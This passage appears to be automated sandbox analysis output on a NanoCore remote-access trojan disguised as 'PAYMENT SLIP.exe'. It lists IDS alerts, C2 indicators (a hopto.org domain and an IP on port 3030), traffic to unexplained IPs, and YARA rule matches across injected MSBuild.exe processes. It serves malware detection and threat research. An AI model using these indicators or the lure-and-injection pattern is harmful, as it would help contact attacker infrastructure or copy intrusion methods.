        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49770 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49771 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49772 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49773 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49777 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49778 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49779 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49780 -> 23.254.130.71:3030
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49781 -> 23.254.130.71:3030
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: seaudo.hopto.org
        Source: Malware configuration extractorURLs: 23.254.130.71
        Source: global trafficTCP traffic: 192.168.2.4:49745 -> 23.254.130.71:3030
        Source: Joe Sandbox ViewASN Name: HOSTWINDSUS HOSTWINDSUS
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 13.224.186.242
        Source: unknownTCP traffic detected without corresponding DNS query: 216.58.215.238
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.205
        Source: unknownTCP traffic detected without corresponding DNS query: 172.217.168.67
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.225
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 172.217.23.42
        Source: unknownTCP traffic detected without corresponding DNS query: 2.20.142.209
        Source: unknownTCP traffic detected without corresponding DNS query: 2.20.142.209
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.25.218
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 2.20.142.209
        Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.131
        Source: unknownTCP traffic detected without corresponding DNS query: 172.217.22.227
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.68
        Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.68
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.138
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_057D2CF6 WSARecv,12_2_057D2CF6
        Source: unknownDNS traffic detected: queries for: seaudo.hopto.org
        Source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmpString found in binary or memory: http://google.com
        Source: PAYMENT SLIP.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_004056E3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056E3
        Source: MSBuild.exe, 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 5704, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6948, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 6804, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hmhrpib.exe PID: 6376, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hmhrpib.exe PID: 6024, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6940, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 6900, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6372, type: MEMORY
        Source: Yara matchFile source: 6.2.PAYMENT SLIP.exe.3160000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.450c0f1.20.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.4507ac8.19.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40feae4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f5eae4.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40feae4.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.4507ac8.19.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a0000.33.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f6310d.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f5eae4.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a4629.32.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a0000.33.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.410310d.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.910500149.0000000001830000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.909856080.0000000001450000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.910512551.0000000001840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.909818098.0000000001420000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.910417181.00000000017D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.910472948.0000000001810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.909835016.0000000001430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.911646592.000000000485A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.910378079.00000000017A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.910442224.00000000017F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.910406423.00000000017C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.910536260.0000000001870000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.912631638.0000000005810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.910428872.00000000017E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 5704, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 5704, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: MSBuild.exe PID: 6948, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 6948, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 6804, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 6804, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: hmhrpib.exe PID: 6376, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: hmhrpib.exe PID: 6376, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: hmhrpib.exe PID: 6024, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: hmhrpib.exe PID: 6024, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: MSBuild.exe PID: 6940, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 6940, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 6900, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: PAYMENT SLIP.exe PID: 6900, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: MSBuild.exe PID: 6372, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: MSBuild.exe PID: 6372, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.48f0272.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.48632ce.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.450c0f1.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.17d0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.MSBuild.exe.2f33c74.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.46658d0.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.184e8a4.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1840000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.3524cf0.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.17f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.46574b4.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.48f4f11.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.17e0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.48f0272.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.34b12fc.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1810000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1430000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1870000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.4507ac8.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1450000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.5810000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.48e703e.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.1420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.17f0000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.1830000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.1420000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1840000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 19.2.MSBuild.exe.40feae4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.MSBuild.exe.3f5eae4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.MSBuild.exe.48e703e.26.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.MSBuild.exe.1830000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
